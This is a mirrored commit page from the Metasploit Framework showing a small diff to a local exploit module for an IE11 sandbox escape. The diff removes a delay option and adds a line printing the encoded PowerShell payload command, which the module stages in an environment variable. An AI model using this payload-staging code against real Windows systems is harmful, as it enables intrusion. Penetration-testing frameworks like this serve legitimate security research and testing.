1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-07-18 18:31:41 +02:00
This commit is contained in:
jvazquez-r7 2014-06-03 09:48:40 -05:00
parent 05ed2340dc
commit b8a2cf776b
2 changed files with 1 additions and 5 deletions

View File

@ -64,11 +64,6 @@ class Metasploit3 < Msf::Exploit::Local
['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
]
))
register_options(
[
OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
])
end
def check
@ -156,6 +151,7 @@ class Metasploit3 < Msf::Exploit::Local
print_good(".NET looks vulnerable, exploiting...")
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
print_status cmd
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
temp = get_env('TEMP')